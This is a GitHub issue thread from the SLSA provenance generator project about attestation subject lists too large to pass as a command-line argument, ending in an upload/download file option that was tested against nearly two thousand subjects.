[bug] Alternative ways required to pass large attestation subjects
Describe the bug
For complex projects that include multiple modules or packages, the number of subjects and size of base64-subjects can easily grow larger than the allowed size of command-line argument and environment strings. For example the size of the subject hashes in a project I tried recently is about 200KB which results in the following error when the generator tries to pass it as command-line argument.
Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too long
To get around that, possible solutions require making changes to the GH runner, which is not a good idea probably.
Would it be possible to pass the subjects in a different way and not as an environment string through command-line argument as done here?
Additional context
- The documentation of kernel call execve() in section
Limits on size of arguments and environmentis helpful. - Here is another related question on Stack Vverflow.
Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
The subjects and their hashes would still need to be computed by a build job as the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passing inputs.base64-subjects as an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.
Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
It was just the number of subjects. There were several metadata files and docs for each artifact.
Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
The subjects and their hashes would still need to be computed by a build
jobas the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passinginputs.base64-subjectsas an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.
Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate so you can't just pass a path to read or something. You could however upload a file containing the subjects and hashes to a the workflow run using actions/upload-artifact and the reusable workflow could download it.
This would complicate the use of the workflow a bit because users would need to call actions/upload-artifact first to upload the file but it might be unavoidable for large subject lists.
Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
It was just the number of subjects. There were several metadata files and docs for each artifact.
So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?
If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.
Yes, I think the right way to do this would need to be via a config file that is committed to the repo. The workflow could read this file from the repository to get the subjects needed. I'm open to other ideas though.
The subjects and their hashes would still need to be computed by a build
jobas the file names can change if they include version numbers, etc. I was wondering if it would be possible to avoid passinginputs.base64-subjectsas an argument string by storing it in a file. That way the builder could read the subjects directly from the file and the issue would be resolved I think.Yeah, I responded without thinking about that bit. Unfortunately, the user's build job(s) and the SLSA generator job(s) are necessarily separate so you can't just pass a path to read or something. You could however upload a file containing the subjects and hashes to a the workflow run using
actions/upload-artifactand the reusable workflow could download it.This would complicate the use of the workflow a bit because users would need to call
actions/upload-artifactfirst to upload the file but it might be unavoidable for large subject lists.
I'm still thinking to keep the workflow as it is, i.e., users would provide the inputs.base64-subjects as the output of the build job. The idea would be to store the input in a file instead of an env variable in the generator workflow itself to avoid passing it as an argument string. Of course that would be limited to the maximum size of a GH job output, but in my case that was not an issue.
Just out of curiosity, what was it that made the base64 of the subjects so large? was it the sheer number of subjects? or were the subject names very long?
It was just the number of subjects. There were several metadata files and docs for each artifact.
So for each artifact there are docs files and metadata files? What kind of files were they? Are the metadata files and docs generated by the build process?
If they are all generated by a single set of build steps then I think it might make sense to have a single SLSA provenance doc, but I wonder if it should be broken up and several provenance docs should be created.
All the files including the docs are created in one single build step in my usecase. Example metadata files are the md5, sha256, sha512 of the artifacts, pom files, SBOM, etc.
@behnazh-w I suppose there's no way for you to split the builds into smaller ones?
One idea, like it's been suggested, is to use a new file option and have it users upload it:
subjects-filename: "./path/to/file"
base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"
Most users would keep the current option, and only users who hit the size limits would use the second option. Wdut?
@behnazh-w I suppose there's no way for you to split the builds into smaller ones?
No, I can't split the build.
One idea, like it's been suggested, is to use a new file option and have it users upload it:
subjects-filename: "./path/to/file" base64-subjects-filename-digest: "base64 output of sha256sum ./path/to/file"Most users would keep the current option, and only users who hit the size limits would use the second option. Wdut?
Initially I was thinking to keep the current option as it is and pass the subjects to the builder binary in a file by reading it from the build job output like this:
echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"
But after thinking some more, passing such a large value as a job output is not a good idea in general and might slow down the GHA runs. So using a new file option as suggested sounds good to me.
Error: An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/x'. Argument list too longAdditional context
- The documentation of kernel call execve() in section
Limits on size of arguments and environmentis helpful.- Here is another related question on Stack Vverflow.
I see. We are getting this error currently not because of GitHub complaining about the size of the input, but because the argument is too long on the command line. If that's the case we could write the input to a temporary file and pass the file to the generator binary without changing the workflow inputs and callers of the workflow would be unchanged.
Though there would be a problem with escaping the input as we can't use environment variables due to the length. We would need to figure out a way to prevent script injection without using environment variables.
@ianlewis @laurentsimon We are hitting this problem in production now: https://github.com/micronaut-projects/micronaut-oracle-cloud/actions/runs/5017226257/jobs/8996007716#step:3:255
As a quick fix, is it possible to store the input in a file instead of an env variable in the generator workflow to avoid passing it as an argument string?
echo "${{ needs.build.outputs.hashes }}" > subjects-file
./"$BUILDER_BINARY" attest --subjects subjects-file -g "$UNTRUSTED_ATTESTATION_NAME"
Yes I think that should be do-able. I think we has discussed this a while ago. @ianlewis not side effects I'm missing, right?
I think we need to implement https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1243865527. For the sha256 of the file content, we either let users call sha256sum themselves, or we make a public version of the secure-upload Action https://github.com/slsa-framework/slsa-github-generator/tree/main/.github/actions/secure-upload-artifact
We also need to take of the fact that the filename should be the basename(path), I think
We can't save the input into a file because to do so, we need to echo <value> but the value is too large. It may also be failing at the time we're setting the env variable.
Limits: https://www.in-ulm.de/~mascheck/various/argmax/
Right. The problem is occurring here when GHA invokes bash to run the script and not when the script is executing the builder binary itself.
An error occurred trying to start process '/usr/bin/bash' with working directory '/home/runner/work/micronaut-oracle-cloud/micronaut-oracle-cloud'. Argument list too long
If it's an input, we can't really avoid putting it in an environment variable because of https://github.com/slsa-framework/slsa-github-generator/issues/845#issuecomment-1273900126
It's a bit message from a usability standpoint but I think the upload/download solution is the currently the only known solution that would work.
We can't save the input into a file because to do so, we need to echo
but the value is too large. It may also be failing at the time we're setting the env variable.
That's true considering the limit size for bash command arguments. Although in the same workflow the same value is passed to echo for debugging purposes, but it didn't cause an issue. Just if you're curious, I have left this line to see if GitHub keeps masking the output due to secrets being present in the step, but that's a separate issue.
I think the upload/download solution is the currently the only known solution that would work.
It sounds good.
Is there a timeline for adding secure upload/download to fix this issue?
I think we can aim for first half of July. Would it be OK on your side? If you need ti earlier, I could give you some hints. Let me know.
I think we can aim for first half of July. Would it be OK on your side? If you need ti earlier, I could give you some hints. Let me know.
Yes, that would work. As a temporary fix I have removed .module, -sources.jar and -javadoc.jar artifacts, but would definitely like to add them back when this is fixed. Thanks!
Re-opening until we have e2e tests for this.
@behnazh-w can you verify that https://github.com/slsa-framework/slsa-github-generator/pull/2365 fixes the issue? You need to reference the builder at main to test. How many subjects caused the problem in your experience?
@laurentsimon Please also add a note about this feature to the CHANGELOG
Thanks for the new feature. I tested the builder at main against 1851 subjects and it works. The original failing pipeline was generating 703 subjects.
Thanks for the info. I'll create the e2e tests with 2k subjects then.
Closing this issue then